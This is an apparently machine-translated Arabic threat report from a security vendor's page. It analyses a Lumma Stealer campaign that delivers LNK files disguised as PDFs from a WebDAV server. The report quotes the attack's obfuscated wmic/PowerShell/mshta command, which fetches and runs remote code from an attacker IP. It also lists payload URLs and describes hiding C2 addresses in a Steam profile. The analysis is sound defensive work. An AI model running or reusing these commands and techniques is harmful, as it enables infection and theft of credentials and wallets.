🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
تستغل حملة Lumma Stealer للبرامج الضارة المؤسسات التعليمية المخترقة لتوزيع ملفات LNK الضارة المتخفية في صورة ملفات PDF، وتستهدف صناعات مثل التمويل والرعاية الصحية والتكنولوجيا والإعلام. بمجرد تنفيذ هذه الملفات، تبدأ عملية إصابة خفية متعددة المراحل، مما يسمح لمجرمي الإنترنت بسرقة كلمات المرور وبيانات المتصفح ومحافظ العملات المشفرة. بفضل تقنيات التهرب المتطورة، بما في ذلك استخدام ملفات تعريف Steam لعمليات القيادة والتحكم، يسلط تهديد البرامج الضارة كخدمة (MaaS) الضوء على الحاجة الملحة لدفاعات قوية للأمن السيبراني. كن يقظًا ضد أساليب التصيد الاحتيالي الخادعة لحماية المعلومات الحساسة من الاستغلال الإلكتروني.
يمكنك مراقبة مؤسستك والدفاع عنها بشكل استباقي ضد التهديدات من الويب المظلم باستخدام CloudSek xviGil.
Schedule a DemoLumma Stealer هو برنامج ضار لسرقة المعلومات يتم تقديمه من خلال منصة البرامج الضارة كخدمة (MaaS). تم تصميمه لسرقة البيانات الحساسة، بما في ذلك كلمات المرور ومعلومات المتصفح وتفاصيل محفظة العملة المشفرة.
يوضح هذا التقرير تفاصيل حملة البرامج الضارة المستمرة التي توزع سارق معلومات Lumma Stealer. يتضمن ناقل العدوى الأساسي للحملة استخدام ملفات LNK (الاختصارات) الضارة التي تم تصميمها لتظهر كمستندات PDF شرعية. تبدأ ملفات LNK هذه، عند تنفيذها، عملية إصابة متعددة المراحل تؤدي في النهاية إلى نشر Lumma Stealer على جهاز الضحية. وتركز الحملة على خداع المستخدمين لتنفيذ ملفات ضارة، وتسليط الضوء على أهمية وعي المستخدم والتدابير الأمنية القوية. تستهدف حملة البرامج الضارة العديد من الصناعات، بما في ذلك التعليم والأوساط الأكاديمية، والشركات والأعمال، والحكومة والشؤون القانونية، والرعاية الصحية والأدوية، والمالية والمصرفية، والهندسة والتصنيع، والتكنولوجيا والبلوك تشين، والإعلام والصحافة.
في السابق، نشرنا تقريرين بحثيين متعمقين لتحليل حملة Lumma Stealer، مع تفصيل تكتيكاتها وتقنياتها وإجراءاتها (TTPs) التي تستخدمها الجهات الفاعلة في مجال التهديد لتوزيع البرامج الضارة ونشرها.
خلال حل وسط من سيارة إلى أخرى، تتم إعادة توجيه المستخدم في البداية إلى خادم ويبداف أثناء زيارة مواقع ويب معينة، وإنشاء اتصال دون علم. قد تؤدي عملية إعادة التوجيه هذه إلى تشغيل معاينة نافذة explorer.exe، وعرض محتويات خادم WebDAV، والذي يستضيف ملفات ضارة مصممة لاستغلال نقاط الضعف في النظام أو تقديم برامج ضارة.
في البنية التحتية التي تم تحليلها، ملفات ضارة تم استضافتهم على خادم ويبداف داخل الدليل المفتوح «http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk»، عندما ينقر المستخدم لتنزيل هيكل الرسوم المدرسية، يقومون بتنزيل ملف ملف "pdf.lnk" الضار، والذي يظهر كملف PDF بسبب أيقونته.
يحتوي الدليل بشكل أساسي ملف «.lnk»، والتي تم تسليحها من أجل تنزيل حمولات ضارة إضافية باستخدام «mshta.exe»، وهو برنامج تنفيذي شرعي من Microsoft مصمم للتشغيل ملفات تطبيق ميكروسوفت أتش تي أم أل (HTA).
غالبًا ما يتم الاستفادة من ملفات LNK (الاختصارات) كنقطة دخول في حملات التصيد الاحتيالي. من خلال استغلال ميزاتها الفريدة، يمكن للجهات الفاعلة في مجال التهديد خداع المستخدمين وتجاوز الإجراءات الأمنية، مما يجعلهم أدوات فعالة للتسلل إلى الأنظمة والشبكات.
يقوم ملف LNK بتشغيل ملف بوويرشيل الأمر الذي يتصل بـ بعيد الخادم، مما يؤدي إلى المرحلة التالية من الهجوم. «استدعاء عملية C:\Windows\System32\Wbem\wmic.exe ينشئ «بوويرشيل إنيكس '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | بوويرشيل -»
هذه الاختصارات الخادعة، التي غالبًا ما تكون مموهة كملفات تنفيذية مشروعة أو ملفات PDF، تغري المستخدمين المطمئنين إلى النقر، مما يؤدي في النهاية إلى تعريض أنظمتهم أو شبكاتهم للخطر.
قمنا باستخراج النص عن طريق التخلص من قسم التراكب، والكشف عن شيء غامض جافا سكريبت كود.
مشوشة جافا سكريبت كود في قسم التراكب في ساماريك
تقوم هذه الوظيفة بتقييم شفرة JavaScript المخزنة في المتغير aEQ. يعد استخدام eval أسلوبًا شائعًا في البرامج النصية الغامضة أو الخبيثة.
يمكن رؤية البرنامج النصي PowerShell من خلال البرنامج النصي JS المبهم. يتم تضمين حمولة مشفرة بـ AES وإجراء لفك تشفيرها في وضع CBC باستخدام مفتاح فك التشفير الثابت في برنامج PowerShell النصي هذا. كما تستخدم تقنيات التشويش الرياضي البسيطة في البرنامج النصي.
تُظهر المتغيرات والوظائف العادية لبرنامج PowerShell النصي كيفية تنزيل الحمولة وتنفيذها.
يتم تنزيل البرنامج النصي النهائي لـ PowerShell واستخراج المحتويات وتنفيذها»كومباس-4.1.2.exe«(لوما ستيلر) من https [:] //80.76.51 [.] 231/كومباس-4.1.2.exe
يحاول Lumma Stealer الاتصال بخوادم الأوامر والتحكم (C2) لتصفية البيانات المسروقة بعد إصابة النظام. يحاول الوصول إلى نطاقات خادم C2 متعددة؛ ومع ذلك، لا يمكن الوصول إلى هذه الخوادم حاليًا.
يستخدم النموذج اتصال Steam إذا لم يتمكن من الوصول إلى كل مجال C2 يمتلكه. تختلف عناوين URL الخاصة بـ Steam عن نطاقات C2 من حيث أنها تحتوي على تقنيات فك تشفير مميزة ويتم تخزينها كرموز تنفيذ.
hxxps: //steamcommunity.com/profiles/76561199724331900
يتبع الرقم 76561199724331900 تنسيق معرف Steam64، مما يشير إلى أن عميل Steam أو اللعبة ربما تحاول حل خدمة شبكة. يشير هذا إلى أن جهازًا على الشبكة يحاول حل الاسم (من المحتمل أن يكون مرتبطًا بجلسة Steam أو خادم الألعاب). تم إنشاء ملف التعريف في 28 يونيو 2024.
يعد إخفاء C2 عبر ملفات تعريف Steam أسلوبًا متطورًا للتهرب ينتهك منصة موثوقة للاتصال الخفي بالقيادة والتحكم.
من المرجح أن يكون ممثل التهديد قد أنشأ عنوان URL هذا لـ Steam، وهو صفحة ملف تعريف لحساب Steam. تتصل العينة أولاً بموقع الويب، وتوزع علامة «actual_persona_name» لاستخراج السلاسل، ثم تستخدم طريقة تشفير Caesar لفك تشفير السلاسل واستخراج نطاقات C2.
استنادًا إلى تحليل الأسماء المختلفة التي تحاكي مستندات PDF الشرعية (مثل العقود والتقارير المالية والمواد الأكاديمية والكتيبات الفنية)، تستهدف برامج Lumma Stealer الضارة الصناعات بما في ذلك على سبيل المثال لا الحصر التعليم والأوساط الأكاديمية والشركات والأعمال والحكومة والشؤون القانونية والرعاية الصحية والأدوية والمالية والمصرفية والهندسة والتصنيع والتكنولوجيا والبلوك تشين والإعلام والصحافة.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.